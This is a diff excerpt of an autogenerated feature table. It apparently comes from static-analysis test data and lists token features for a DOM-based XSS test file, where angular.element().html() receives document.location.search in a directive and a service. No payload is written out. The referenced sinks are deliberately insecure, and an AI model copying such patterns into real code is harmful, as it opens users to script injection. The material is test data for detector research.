    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:32 | exceptional return of angular ...
    ') | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:32 | exceptional return of angular ...
    ') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:37 | angular ... ').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:37 | angular ... ').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:37 | angular ... ').html | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:37 | angular ... ').html | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:37 | angular ... ').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:45 | angular ... 'SAFE') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:45 | angular ... 'SAFE') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:45 | angular ... 'SAFE') | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:45 | angular ... 'SAFE') | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:45 | angular ... 'SAFE') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:45 | exceptional return of angular ... 'SAFE') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:45 | exceptional return of angular ... 'SAFE') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:45 | exceptional return of angular ... 'SAFE') | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:45 | exceptional return of angular ... 'SAFE') | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:91:9:91:45 | exceptional return of angular ... 'SAFE') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:91:17:91:23 | element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:91:17:91:23 | element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:91:17:91:23 | element | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:91:17:91:23 | element | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:91:17:91:23 | element | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:91:25:91:31 | '
    ' | CalleeFlexibleAccessPath | angular.element | | autogenerated/Xss/DomBasedXss/tst.js:91:25:91:31 | '
    ' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:91:25:91:31 | '
    ' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16372,6 +114027,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:91:25:91:31 | '
    ' | enclosingFunctionName | service#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:91:25:91:31 | '
    ' | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:91:25:91:31 | '
    ' | receiverName | angular | +| autogenerated/Xss/DomBasedXss/tst.js:91:34:91:37 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:91:34:91:37 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:91:34:91:37 | html | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:91:34:91:37 | html | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:91:34:91:37 | html | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:91:39:91:44 | 'SAFE' | CalleeFlexibleAccessPath | angular.element().html | | autogenerated/Xss/DomBasedXss/tst.js:91:39:91:44 | 'SAFE' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:91:39:91:44 | 'SAFE' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16379,16 +114039,135 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:91:39:91:44 | 'SAFE' | enclosingFunctionBody | angular element
    html document location search angular element
    html SAFE | | autogenerated/Xss/DomBasedXss/tst.js:91:39:91:44 | 'SAFE' | enclosingFunctionName | service#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:91:39:91:44 | 'SAFE' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:93:6:93:14 | directive | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:93:6:93:14 | directive | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:93:6:93:14 | directive | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:93:16:93:27 | 'myCustomer' | CalleeFlexibleAccessPath | angular.module().service().service().directive | | autogenerated/Xss/DomBasedXss/tst.js:93:16:93:27 | 'myCustomer' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:93:16:93:27 | 'myCustomer' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:93:16:93:27 | 'myCustomer' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:93:16:93:27 | 'myCustomer' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:93:29 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:93:29 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:93:29 | this | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:93:29 | this | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:93:29 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | 'arguments' object of anonymous function | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | 'arguments' object of anonymous function | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | exceptional return of anonymous function | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | exceptional return of anonymous function | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | exceptional return of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | functio ... ;\\n } | CalleeFlexibleAccessPath | angular.module().service().service().directive | | autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | functio ... ;\\n } | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | functio ... ;\\n } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | functio ... ;\\n } | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | functio ... ;\\n } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | return of anonymous function | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | return of anonymous function | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:93:30:100:5 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:94:16:99:9 | {\\n ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:94:16:99:9 | {\\n ... } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:94:16:99:9 | {\\n ... } | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:94:16:99:9 | {\\n ... } | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:94:16:99:9 | {\\n ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:95:13:95:16 | link | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:95:13:95:16 | link | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:95:13:95:16 | link | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:95:13:95:16 | link | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:95:13:95:16 | link | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:95:13:98:13 | link: f ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:95:13:98:13 | link: f ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:95:13:98:13 | link: f ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:95:13:98:13 | link: f ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:95:13:98:13 | link: f ... } | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:95:13:98:13 | link: f ... } | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:95:13:98:13 | link: f ... } | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:95:13:98:13 | link: f ... } | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:95:13:98:13 | link: f ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:95:13:98:13 | link: f ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:95:18 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:95:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:95:18 | this | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:95:18 | this | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:95:18 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | 'arguments' object of method link | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | 'arguments' object of method link | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | 'arguments' object of method link | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | 'arguments' object of method link | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | 'arguments' object of method link | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | exceptional return of method link | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | exceptional return of method link | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | exceptional return of method link | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | exceptional return of method link | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | exceptional return of method link | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | functio ... } | assignedToPropName | link | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | functio ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | functio ... } | contextSurroundingFunctionParameters | ()\n(scope, element) | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | functio ... } | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | functio ... } | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | functio ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | return of method link | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | return of method link | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | return of method link | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | return of method link | enclosingFunctionName | directive#functionalargument | +| 